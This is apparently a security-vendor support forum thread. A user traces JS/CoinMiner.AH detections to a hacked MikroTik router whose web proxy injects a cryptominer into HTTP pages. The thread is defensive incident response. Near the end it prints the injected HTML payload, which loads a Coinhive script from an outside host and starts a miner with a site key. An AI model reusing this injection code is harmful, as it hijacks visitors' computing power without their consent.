JS/CoinMiner.AH

[MAGIK José Rocha 2]

Hi, 

We have a computer with more than 10.000 detected threats like the one bellow:

Threat: JS/CoinMiner.AH

Process: C:\Windows\System32\wscript.exe

Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login

Is this a sign that the computer is infected or this is the result of attempts to infect it?

Note: The address 10.100.1.254 is a Mikrotik router and it is updated with latest updates.

 

[Marcos 5,070]

In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ELC on that machine and provide me with the generated archive.

[itman 1,659]

You can find the source by creating a HIPS rule to block the startup of C:\Windows\System32\wscript.exe. Also make sure you log the event and set its type to "warning." This shouldn't cause any issues unless you have created any custom .js or .ws scripts.

If the HIPS log shows the source as svchost.exe, this could possibly indicate that a scheduled task is behind the activity. Unfortunately, the HIPS won't show want service is behind the activity. 

[MAGIK José Rocha 2]

On 8/31/2018 at 2:39 PM, Marcos said:

In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ESET Log Collector on that machine and provide me with the generated archive.

Here are the collected logs on the affected machine.

Thanks for your help.

ees_logs.zip

[MAGIK José Rocha 2]

I've been able to find the origin of this detections and already solved the problem.

When I was trying to understand the origin of this trojans, I've noticed that some os the addresses where legit and doesn't raise any problems outside our client network.

So I started a search for some kind of proxy that could inject malicious code tho legit http pages and find out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where they injected the malicious code and it was blocked later on the client machine.

The hack has been possible because of this vulnerability on Mikrotik Router OS https://blog.mikrotik.com/security/winbox-vulnerability.html

I've changed every passwords, disabled the web proxy and deleted the firewall rule, so now everything if fine.

@itman, @Marcos Thanks for the tips

Edited September 3, 2018 by MAGIK José Rocha

[Marcos 5,070]

We appreciate your feedback José. In other cases with different brands of routers, a factory reset followed and upgrading the firmware didn't help.

[Marcos 5,070]

Here's a good write-up of exploitation of Mikrotik routers' webproxy feature:

https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-–-First-we-cryptojack-Brazil,-then-we-take-the-World-/

[MAGIK José Rocha 2]

Here is the html source for the page that runs the miner:

<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
	<title>"$(url)"</title> 
<_script src="https://coinhive.com/lib/coinhive.min.js"></script>
<_script>
	var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2});
	miner.start();
</script>
</head>
<frameset>
<frame src="$(url)"></frame>
</frameset>
</html>

 

[Marcos 5,070]

20 minutes ago, MAGIK José Rocha said:

Here is the html source for the page that runs the miner:

Yes. That is exactly what triggers the detection and a screen shot of this was also included in the write-up mentioned above.